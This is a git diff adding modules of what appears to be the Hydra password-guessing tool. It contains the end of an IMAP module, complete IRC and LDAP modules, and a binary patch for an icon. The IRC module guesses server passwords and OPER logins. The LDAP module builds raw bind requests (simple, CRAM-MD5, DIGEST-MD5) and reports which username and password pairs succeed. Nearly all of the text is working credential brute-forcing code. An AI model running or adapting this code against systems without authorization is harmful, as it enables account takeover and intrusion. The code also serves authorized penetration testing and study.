default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +int service_imap_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-irc.c b/hydra-irc.c new file mode 100644 index 0000000..f68936d --- /dev/null +++ b/hydra-irc.c @@ -0,0 +1,218 @@ +#include "hydra-mod.h" + +/* + +RFC 1459: Internet Relay Chat Protocol + +*/ + +extern char *HYDRA_EXIT; +char *buf; +char buffer[300] = ""; +int myport = PORT_IRC, mysslport = PORT_IRC_SSL; + +int start_oper_irc(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass; + int ret; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + sprintf(buffer, "OPER %s %s\r\n", login, pass); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 3; + } + ret = hydra_recv(s, buffer, sizeof(buffer)); + /* :irc.debian.org 381 koma :You are now an IRC Operator */ + /* :irc.debian.org 464 koma :Invalid password */ + if ((ret > 0) && (strstr(buffer, " 381 ") != NULL)) { + hydra_report_found_host(port, ip, "irc", fp); + hydra_completed_pair_found(); + } else { + hydra_completed_pair(); + } + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 2; +} + +int send_nick(int s, char *ip, char *pass) { + if (strlen(pass) > 0) { + sprintf(buffer, "PASS %s\r\n", pass); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return -1; + } + } + sprintf(buffer, "CAP LS\r\n"); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return -1; + } + sprintf(buffer, "NICK hydra%d\r\nUSER hydra%d hydra %s :hydra\r\n", (int) getpid(), (int) getpid(), hydra_address2string(ip)); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return -1; + } + return 0; +} + +int irc_server_connect(char *ip, int sock, int port, unsigned char options) { + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(275000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + return sock; +} + +int start_pass_irc(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *pass; + int ret; + + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + s = irc_server_connect(ip, s, port, options); + if (s < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + return 3; + } + + if (send_nick(s, ip, pass) < 0) { + return 3; + } + + ret = hydra_recv(s, buffer, sizeof(buffer)); +#ifdef HAVE_PCRE + if ((ret > 0) && (!hydra_string_match(buffer, "ERROR\\s.*password"))) { +#else + if ((ret > 0) && (strstr(buffer, "ERROR") == NULL)) { +#endif + hydra_report_pass_found(port, ip, "irc", fp); + hydra_completed_pair_found(); + hydra_report(stderr, "[INFO] Server password '%s' is working, you can pass it as argument\nto irc module to then try login/password oper mode\n", pass); + } else { + if (verbose && (miscptr != NULL)) + hydra_report(stderr, "[VERBOSE] Server is requesting a general password, '%s' you entered is not working\n", miscptr); + hydra_completed_pair(); + } + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 4; +} + +void service_irc(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1, ret; + char *buf; + + hydra_register_socket(sp); + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + next_run = 0; + switch (run) { + case 1: /* connect and service init function */ + + sock = irc_server_connect(ip, sock, port, options); + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + + if (miscptr == NULL) { + miscptr = ""; + } + if (send_nick(sock, ip, miscptr) < 0) { + hydra_child_exit(1); + } + + ret = hydra_recv(sock, buffer, sizeof(buffer)); + + /* ERROR :Bad password */ +#ifdef HAVE_PCRE + if ((ret > 0) && (hydra_string_match(buffer, "ERROR\\s.*password"))) { +#else + if ((ret > 0) && (strstr(buffer, "ERROR") != NULL)) { +#endif + if (verbose) + hydra_report(stderr, "[INFO] Server is requesting a password, will try to find it\n"); + if (sock >= 0) + sock = hydra_disconnect(sock); + next_run = 4; + break; + } + + while (hydra_data_ready(sock)) { + buf = hydra_receive_line(sock); + free(buf); + } + + if ((ret > 0) && (strstr(buffer, " 432 ") != NULL)) { + /* :irc.debian.org 432 * hydra_5075 :Erroneous nickname */ + if (verbose) + hydra_report(stderr, "[ERROR] Erroneous nickname\n"); + hydra_child_exit(0); + } + + if ((ret > 0) && (strstr(buffer, " 433 ") != NULL)) { + /* :irc.debian.org 433 * hydra :Nickname already in use */ + if (verbose) + hydra_report(stderr, "[ERROR] Nickname already in use\n"); + hydra_child_exit(0); + } + + /* ERROR :Bad password is returned from ngircd when it s waiting for a server password */ + if ((ret > 0) && (strstr(buffer, " 001 ") == NULL)) { + /* seems we not successfully connected */ + hydra_report(stderr, "[ERROR] should not be able to identify server msg, please report it\n%s\n", buffer); + hydra_child_exit(0); + } + + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_oper_irc(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + case 4: + next_run = start_pass_irc(sock, ip, port, options, miscptr, fp); + break; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +int service_irc_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-ldap.c b/hydra-ldap.c new file mode 100644 index 0000000..8546fa0 --- /dev/null +++ b/hydra-ldap.c @@ -0,0 +1,452 @@ +#include "hydra-mod.h" +#include "sasl.h" + +extern char *HYDRA_EXIT; + +unsigned char *buf; +int counter; +int tls_required = 0; + +int start_ldap(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp, char version, int auth_method) { + char *empty = ""; + char *login = "", *pass; + unsigned char buffer[512]; + int length = 0; + int ldap_auth_mechanism = auth_method; + + /* + The LDAP "simple" method has three modes of operation: + * anonymous= no user no pass + * unauthenticated= user but no pass + * user/password authenticated= user and pass + */ + + if ((miscptr != NULL) && (ldap_auth_mechanism == AUTH_CLEAR)) { + login = miscptr; + } else { + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + } + + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + switch (ldap_auth_mechanism) { + case AUTH_CLEAR: + length = 14 + strlen(login) + strlen(pass); + break; +#ifdef LIBOPENSSL + case AUTH_CRAMMD5: + length = 14 + strlen(miscptr) + strlen("CRAM-MD5") + 2; + break; + case AUTH_DIGESTMD5: + length = 14 + strlen(miscptr) + strlen("DIGEST-MD5") + 2; + break; +#endif + } + + memset(buffer, 0, sizeof(buffer)); + buffer[0] = 48; + buffer[1] = length - 2; + + buffer[2] = 2; + buffer[3] = 1; + buffer[4] = counter % 256; + + buffer[5] = 96; + buffer[6] = length - 7; + buffer[7] = 2; + buffer[8] = 1; + buffer[9] = version; + buffer[10] = 4; + + if (ldap_auth_mechanism == AUTH_CLEAR) { + buffer[11] = strlen(login); /* DN */ + memcpy(&buffer[12], login, strlen(login)); + buffer[12 + strlen(login)] = (unsigned char) 128; + buffer[13 + strlen(login)] = strlen(pass); + memcpy(&buffer[14 + strlen(login)], pass, strlen(pass)); /* PASS */ + } else { + char *authm = "DIGEST-MD5"; + + if (ldap_auth_mechanism == AUTH_CRAMMD5) { + authm = "CRAM-MD5"; + } + + if ((strlen(miscptr)) > sizeof(buffer) - 16 - strlen(authm)) { + miscptr[sizeof(buffer) - 16 - strlen(authm)] = '\0'; + } + + buffer[11] = strlen(miscptr); /* DN */ + memcpy(&buffer[12], miscptr, strlen(miscptr)); + buffer[12 + strlen(miscptr)] = 163; + buffer[13 + strlen(miscptr)] = 2 + strlen(authm); + buffer[14 + strlen(miscptr)] = 4; + buffer[15 + strlen(miscptr)] = strlen(authm); + memcpy(&buffer[16 + strlen(miscptr)], authm, strlen(authm)); + } + if (hydra_send(s, (char *) buffer, length, 0) < 0) + return 1; + if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL) + return 1; + + if (buf[0] != 0 && buf[0] != 32 && buf[9] == 2) { + if (verbose) + hydra_report(stderr, "[VERBOSE] Protocol invalid\n"); + free(buf); + return 3; + } + + if (buf[0] != 0 && buf[0] != 32 && buf[9] == 13) { + if (verbose) + hydra_report(stderr, "[VERBOSE] Confidentiality required, TLS has to be enabled\n"); + tls_required = 1; + free(buf); + return 1; + } + + if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 34) { + hydra_report(stderr, "[ERROR] Invalid DN Syntax\n"); + hydra_child_exit(2); + free(buf); + return 3; + } +#ifdef LIBOPENSSL + +/* one more step auth for CRAM and DIGEST */ + if (ldap_auth_mechanism == AUTH_CRAMMD5) { + /* get the challenge, need to extract it */ + char *ptr; + char buf2[32]; + + ptr = strstr((char *) buf, "<"); + sasl_cram_md5(buf2, pass, ptr); + if (buf2 == NULL) + return 1; + counter++; + if (strstr(miscptr, "^USER^") != NULL) { + miscptr = hydra_strrep(miscptr, "^USER^", login); + } + + length = 12 + strlen(miscptr) + 4 + strlen("CRAM-MD5") + 2 + strlen(login) + 1 + strlen(buf2); + + memset(buffer, 0, sizeof(buffer)); + buffer[0] = 48; + buffer[1] = length - 2; + + buffer[2] = 2; + buffer[3] = 1; + buffer[4] = counter % 256; + + buffer[5] = 96; + buffer[6] = length - 7; + buffer[7] = 2; + buffer[8] = 1; + buffer[9] = version; + buffer[10] = 4; + + buffer[11] = strlen(miscptr); /* DN */ + memcpy(&buffer[12], miscptr, strlen(miscptr)); + buffer[12 + strlen(miscptr)] = 163; + buffer[13 + strlen(miscptr)] = 2 + strlen("CRAM-MD5") + 2 + strlen(login) + 1 + strlen(buf2); + buffer[14 + strlen(miscptr)] = 4; + buffer[15 + strlen(miscptr)] = strlen("CRAM-MD5"); + memcpy(&buffer[16 + strlen(miscptr)], "CRAM-MD5", strlen("CRAM-MD5")); + buffer[16 + strlen(miscptr) + strlen("CRAM-MD5")] = 4; + buffer[17 + strlen(miscptr) + strlen("CRAM-MD5")] = strlen(login) + 1 + strlen(buf2); + memcpy(&buffer[18 + strlen(miscptr) + strlen("CRAM-MD5")], login, strlen(login)); + buffer[18 + strlen(miscptr) + strlen("CRAM-MD5") + strlen(login)] = ' '; + memcpy(&buffer[18 + strlen(miscptr) + strlen("CRAM-MD5") + strlen(login) + 1], buf2, strlen(buf2)); + + if (hydra_send(s, (char *) buffer, length, 0) < 0) + return 1; + free(buf); + if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL) + return 1; + } else { + if (ldap_auth_mechanism == AUTH_DIGESTMD5) { + char *ptr; + char buffer2[500]; + int ind = 0; + + ptr = strstr((char *) buf, "realm="); + + counter++; + if (strstr(miscptr, "^USER^") != NULL) { + miscptr = hydra_strrep(miscptr, "^USER^", login); + } + + sasl_digest_md5(buffer2, login, pass, ptr, miscptr, "ldap", NULL, 0, NULL); + if (buffer2 == NULL) { + free(buf); + return 3; + } + + length = 26 + strlen(miscptr) + strlen("DIGEST-MD5") + strlen(buffer2); + + memset(buffer, 0, sizeof(buffer)); + ind = 0; + buffer[ind] = 48; + ind++; + buffer[ind] = 130; + ind++; + + if (length - 4 > 255) { + buffer[ind] = 1; + ind++; + buffer[ind] = length - 256 - 4; + ind++; + } else { + buffer[ind] = 0; + ind++; + buffer[ind] = length - 4; + ind++; + } + + buffer[ind] = 2; + ind++; + buffer[ind] = 1; + ind++; + buffer[ind] = counter % 256; + ind++; + buffer[ind] = 96; /*0x60 */ + ind++; + buffer[ind] = 130; + ind++; + if (length - 7 - 4 > 255) { + buffer[ind] = 1; + ind++; + buffer[ind] = length - 256 - 11; + ind++; + } else { + buffer[ind] = 0; + ind++; + buffer[ind] = length - 11; + ind++; + } + + buffer[ind] = 2; + ind++; + buffer[ind] = 1; + ind++; + buffer[ind] = version; + ind++; + buffer[ind] = 4; + ind++; + buffer[ind] = strlen(miscptr); + ind++; + memcpy(&buffer[ind], miscptr, strlen(miscptr)); + /*DN*/ buffer[ind + strlen(miscptr)] = 163; //0xa3 + ind++; + buffer[ind + strlen(miscptr)] = 130; //0x82 + ind++; + + if (strlen(buffer2) + 6 + strlen("DIGEST-MD5") > 255) { + buffer[ind + strlen(miscptr)] = 1; + ind++; + buffer[ind + strlen(miscptr)] = strlen(buffer2) + 6 + strlen("DIGEST-MD5") - 256; + } else { + buffer[ind + strlen(miscptr)] = 0; + ind++; + buffer[ind + strlen(miscptr)] = strlen(buffer2) + 6 + strlen("DIGEST-MD5"); + } + ind++; + + buffer[ind + strlen(miscptr)] = 4; + ind++; + buffer[ind + strlen(miscptr)] = strlen("DIGEST-MD5"); + ind++; + memcpy(&buffer[ind + strlen(miscptr)], "DIGEST-MD5", strlen("DIGEST-MD5")); + buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = 4; + ind++; + buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = 130; + ind++; + + if (strlen(buffer2) > 255) { + buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = 1; + ind++; + buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = strlen(buffer2) - 256; + } else { + buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = 0; + ind++; + buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = strlen(buffer2); + } + ind++; + memcpy(&buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")], buffer2, strlen(buffer2)); + ind++; + + if (hydra_send(s, (char *) buffer, length, 0) < 0) + return 1; + free(buf); + if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL) + return 1; + } + } +#endif + + /* success is: 0a 01 00 - failure is: 0a 01 31 */ + if ((buf[0] != 0 && buf[9] == 0) || (buf[0] != 32 && buf[9] == 32)) { + hydra_report_found_host(port, ip, "ldap", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + + if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 7) { + hydra_report(stderr, "[ERROR] Unknown authentication method\n"); + free(buf); + hydra_child_exit(2); + } + + if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 53) { + if (verbose) + hydra_report(stderr, "[VERBOSE] Server unwilling to perform action, maybe deny by server config or too busy when tried login: %s password: %s\n", login, pass); + free(buf); + return 1; + } + + if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 2) { + hydra_report(stderr, "[ERROR] Invalid protocol version, you tried ldap%c, better try ldap%c\n", version + '0', version == 2 ? '3' : '2'); + free(buf); + hydra_child_exit(2); + sleep(1); + hydra_child_exit(2); + } +//0 0x30, 0x84, 0x20, 0x20, 0x20, 0x10, 0x02, 0x01, +//8 0x01, 0x61, 0x84, 0x20, 0x20, 0x20, 0x07, 0x0a, +//16 0x01, 0x20, 0x04, 0x20, 0x04, 0x20, 0x00, 0x00, + + // this is for w2k8 active directory ldap auth + if (buf[0] == 48 && buf[1] == 132) { + if (buf[9] == 0x61 && buf[1] == 0x84) { + if (buf[17] == 0 || buf[17] == 0x20) { + hydra_report_found_host(port, ip, "ldap", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + } + } else { + + if (buf[9] != 49 && buf[9] != 2 && buf[9] != 53) { + hydra_report(stderr, "[ERROR] Uh, unknown LDAP response! Please report this: \n"); + print_hex((unsigned char *) buf, 24); + free(buf); + return 3; + } + } + + hydra_completed_pair(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 2; +} + +void service_ldap(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, char version, int auth_method) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_LDAP, mysslport = PORT_LDAP_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(275000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + counter = 1; + if (tls_required) { + /* Start TLS operation OID = 1.3.6.1.4.1.1466.20037 according to RFC 2830 */ + char confidentiality_required[] = "\x30\x1d\x02\x01\x01\x77\x18\x80\x16\x31\x2e\x33\x2e\x36\x2e\x31\x2e\x34\x2e\x31\x2e\x31\x34\x36\x36\x2e\x32\x30\x30\x33\x37"; + + if (hydra_send(sock, confidentiality_required, strlen(confidentiality_required), 0) < 0) + hydra_child_exit(1); + + if ((buf = (unsigned char *) hydra_receive_line(sock)) == NULL) + hydra_child_exit(1); + + if ((buf[0] != 0 && buf[9] == 0) || (buf[0] != 32 && buf[9] == 32)) { + /* TLS option negociation goes well, now trying to connect */ + if ((hydra_connect_to_ssl(sock) == -1) && verbose) { + hydra_report(stderr, "[ERROR] Can't use TLS\n"); + hydra_child_exit(1); + } else { + if (verbose) + hydra_report(stderr, "[VERBOSE] TLS connection done\n"); + counter++; + } + } else { + hydra_report(stderr, "[ERROR] Can't use TLS %s\n", buf); + hydra_child_exit(1); + } + } + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_ldap(sock, ip, port, options, miscptr, fp, version, auth_method); + counter++; + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +void service_ldap2(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + service_ldap(ip, sp, options, miscptr, fp, port, 2, AUTH_CLEAR); +} + +void service_ldap3(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + service_ldap(ip, sp, options, miscptr, fp, port, 3, AUTH_CLEAR); +} + +void service_ldap3_cram_md5(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + service_ldap(ip, sp, options, miscptr, fp, port, 3, AUTH_CRAMMD5); +} + +void service_ldap3_digest_md5(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + service_ldap(ip, sp, options, miscptr, fp, port, 3, AUTH_DIGESTMD5); +} + +int service_ldap_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-logo.ico b/hydra-logo.ico new file mode 100644 index 0000000000000000000000000000000000000000..1a131e7d37e68efa2df6fb42d5ac8d85fdc2068a GIT binary patch literal 38078 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 